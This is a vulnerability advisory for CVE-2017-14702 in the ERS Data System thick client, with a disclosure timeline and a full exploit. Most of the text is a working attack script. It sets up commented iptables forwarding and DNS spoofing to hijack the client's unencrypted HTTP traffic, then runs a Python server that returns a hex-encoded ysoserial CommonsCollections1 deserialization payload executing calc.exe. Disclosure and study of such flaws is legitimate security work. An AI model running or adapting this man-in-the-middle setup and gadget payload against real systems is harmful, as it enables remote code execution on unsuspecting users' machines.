ERS Data System 1.8.1.0 / 4.0 allows remote attackers to execute arbitrary code, related to the use of the com.branaghgroup.ecers.update.UpdateRequest" objects deserialization.
Deserialization of Untrusted Data (CWE-502)
Environment Rating Scale (ERS), Branagh Information Group, Inc.
ERS Data System - 1.8.1.0
| Component | Hash |
|---|---|
| ecers_3.03.jar | 1b1758051d501fe610148e8b19b96825 |
| commons-collections_3.2.jar | 7b9216b608d550787bdf43a63d88bf3b |
| ecers_3.65.jar | b80fc66fa94b6dafa34a024577f12671 |
Remote
true
Attackers can exploit this vulnerability by responding to the ERS thick clients HTTP requests with malicious serialized Java objects. The vulnerability can be triggered during the authentication of the thick client, or subsequent requests to the ERS web service.
Product Website
Product Download
West Shepherd
wshepherd0010[at]gmail.com
CVE-2017-14702.
| Date | Action |
|---|---|
| 9/21/2017 | Submitted CVE ID request to MITRE via web form, received email confirming submission. |
| 9/22/2017 | Received response from MITRE CVE assignment team, CVE ID reserved. |
| 9/25/2017 | Contacted vendor via contact form on website, no reply. |
| 9/27/2017 | Contacted vendor CEO via email offering to work with their development team to remediate the issue at no cost, no reply. |
| 9/29/2017 | Released advisory publicly without exploit code to allow vendor time to fix the issue. |
| 10/3/2017 | No contact from vendor. Released exploit code to validate vulnerability. |
| 1/4/2018 | Coordinated with vendor for follow up assessment on updated code. |
| 1/17/2018 | Contacted vendor via email with report on findings. |
Exploit code publication pending on exploit-db.
# Exploit Title: ERS Data System 1.8.1 Deserialize Vulnerability
# Google Dork: N/A
# Date: 9/21/2017
# Exploit Author: West Shepherd
# Vendor Homepage: http://www.ersdata.com
# Software Link: www.ersdata.com/downloads/ErsSetup.exe
# Version: 1.8.1.0
# Tested on: Windows 7 x86
# CVE : CVE-2017-14702
# Description:
# ERS Data System 1.8.1.0 allows remote attackers to execute arbitrary code, related to the use of
# com.branaghgroup.ecers.update.UpdateRequest deserialization.
# Exploitaiton:
# The ERS Data System thick client connects to the www.ersdata.com API via an unencrypted HTTP connection on TCP port 3311.
# To redirect requests from the thick client to the attacking machine, enable packet forwarding:
#!/bin/bash
#echo 1 > /proc/sys/net/ipv4/ip_forward
#iptables -F INPUT
#iptables -F FORWARD
#iptables -F OUTPUT
#iptables -F -t nat
#iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT
#iptables -t nat -A POSTROUTING -s 192.168.85.0/24 ! -d 192.168.85.0/24 -j MASQUERADE
#iptables -P INPUT ACCEPT
#iptables -P FORWARD ACCEPT
#iptables -P OUTPUT ACCEPT
# Then poison DNS requests to the www.ersdata.com domain:
# DNS Spoof https://github.com/devleoper/arp-dns-spoof
# root@kali:/usr/share/arp-dns-spoof# cat dns_packet_spoof.py | egrep "domain =|localIP ="
# domain = 'www.ersdata.com' # domain to be spoofed
# localIP = '192.168.85.131' # IP address for poisoned hosts.
# Run the request handler on the attacking machine, which will answer all requests with malicous serialized gadgets. For example:
#!/usr/bin/python
import SocketServer, sys
from SimpleHTTPServer import SimpleHTTPRequestHandler
# POST Handler
class HTTPHandler(SimpleHTTPRequestHandler):
def __init__(self,req,client_addr,server):
SimpleHTTPRequestHandler.__init__(self,req,client_addr,server)
def do_POST(self):
# java -jar ysoserial-master-v0.0.5-g1f2e7bf-14.jar CommonsCollections1 calc.exe > calc.bin
# python -c 'import binascii, re;print "\\x"+"\\x".join(re.findall("..",binascii.hexlify(open("calc.bin","rb").read())))'
response = ( "\xac\xed\x00\x05\x73\x72\x00\x32\x73\x75\x6e\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x61\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x2e\x41\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x55\xca\xf5\x0f\x15\xcb\x7e\xa5\x02\x00\x02\x4c\x00\x0c\x6d\x65\x6d\x62\x65\x72\x56\x61\x6c\x75\x65\x73\x74\x00\x0f\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x4d\x61\x70\x3b\x4c\x00\x04\x74\x79\x70\x65\x74\x00\x11\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x78\x70\x73\x7d\x00\x00\x00\x01\x00\x0d\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x4d\x61\x70\x78\x72\x00\x17\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x50\x72\x6f\x78\x79\xe1\x27\xda\x20\xcc\x10\x43\xcb\x02\x00\x01\x4c\x00\x01\x68\x74\x00\x25\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x72\x65\x66\x6c\x65\x63\x74\x2f\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x78\x70\x73\x71\x00\x7e\x00\x00\x73\x72\x00\x2a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x6d\x61\x70\x2e\x4c\x61\x7a\x79\x4d\x61\x70\x6e\xe5\x94\x82\x9e\x79\x10\x94\x03\x00\x01\x4c\x00\x07\x66\x61\x63\x74\x6f\x72\x79\x74\x00\x2c\x4c\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x43\x68\x61\x69\x6e\x65\x64\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x30\xc7\x97\xec\x28\x7a\x97\x04\x02\x00\x01\x5b\x00\x0d\x69\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x73\x74\x00\x2d\x5b\x4c\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\x78\x70\x75\x72\x00\x2d\x5b\x4c\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\xbd\x56\x2a\xf1\xd8\x34\x18\x99\x02\x00\x00\x78\x70\x00\x00\x00\x05\x73\x72\x00\x3b\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x43\x6f\x6e\x73\x74\x61\x6e\x74\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x58\x76\x90\x11\x41\x02\xb1\x94\x02\x00\x01\x4c\x00\x09\x69\x43\x6f\x6e\x73\x74\x61\x6e\x74\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x78\x70\x76\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x52\x75\x6e\x74\x69\x6d\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x49\x6e\x76\x6f\x6b\x65\x72\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x87\xe8\xff\x6b\x7b\x7c\xce\x38\x02\x00\x03\x5b\x00\x05\x69\x41\x72\x67\x73\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x4c\x00\x0b\x69\x4d\x65\x74\x68\x6f\x64\x4e\x61\x6d\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x0b\x69\x50\x61\x72\x61\x6d\x54\x79\x70\x65\x73\x74\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x78\x70\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90\xce\x58\x9f\x10\x73\x29\x6c\x02\x00\x00\x78\x70\x00\x00\x00\x02\x74\x00\x0a\x67\x65\x74\x52\x75\x6e\x74\x69\x6d\x65\x75\x72\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x43\x6c\x61\x73\x73\x3b\xab\x16\xd7\xae\xcb\xcd\x5a\x99\x02\x00\x00\x78\x70\x00\x00\x00\x00\x74\x00\x09\x67\x65\x74\x4d\x65\x74\x68\x6f\x64\x75\x71\x00\x7e\x00\x1e\x00\x00\x00\x02\x76\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\xa0\xf0\xa4\x38\x7a\x3b\xb3\x42\x02\x00\x00\x78\x70\x76\x71\x00\x7e\x00\x1e\x73\x71\x00\x7e\x00\x16\x75\x71\x00\x7e\x00\x1b\x00\x00\x00\x02\x70\x75\x71\x00\x7e\x00\x1b\x00\x00\x00\x00\x74\x00\x06\x69\x6e\x76\x6f\x6b\x65\x75\x71\x00\x7e\x00\x1e\x00\x00\x00\x02\x76\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x76\x71\x00\x7e\x00\x1b\x73\x71\x00\x7e\x00\x16\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00\x78\x70\x00\x00\x00\x01\x74\x00\x08\x63\x61\x6c\x63\x2e\x65\x78\x65\x74\x00\x04\x65\x78\x65\x63\x75\x71\x00\x7e\x00\x1e\x00\x00\x00\x01\x71\x00\x7e\x00\x23\x73\x71\x00\x7e\x00\x11\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x49\x6e\x74\x65\x67\x65\x72\x12\xe2\xa0\xa4\xf7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6c\x75\x65\x78\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4e\x75\x6d\x62\x65\x72\x86\xac\x95\x1d\x0b\x94\xe0\x8b\x02\x00\x00\x78\x70\x00\x00\x00\x01\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x4d\x61\x70\x05\x07\xda\xc1\xc3\x16\x60\xd1\x03\x00\x02\x46\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6f\x6c\x64\x78\x70\x3f\x40\x00\x00\x00\x00\x00\x00\x77\x08\x00\x00\x00\x10\x00\x00\x00\x00\x78\x78\x76\x72\x00\x12\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x76\x65\x72\x72\x69\x64\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x71\x00\x7e\x00\x3a"
)
self.send_response(200)
self.send_header("Content-type", "text/html")
self.send_header("Content-length", len(response))
self.end_headers()
self.wfile.write(response)
try:
httpd = SocketServer.TCPServer(("", 3311), HTTPHandler)
print "Serving at port: ", 3311
httpd.serve_forever()
except:
print "Exiting..."Contact West Shepherd wshepherd0010[at]gmail.com
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: CryptUp 4.4.6 Gmail Encryption https://cryptup.org
Comment: Seamlessly send, receive and search encrypted email
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
6/I9
=vCq5
-----END PGP PUBLIC KEY BLOCK-----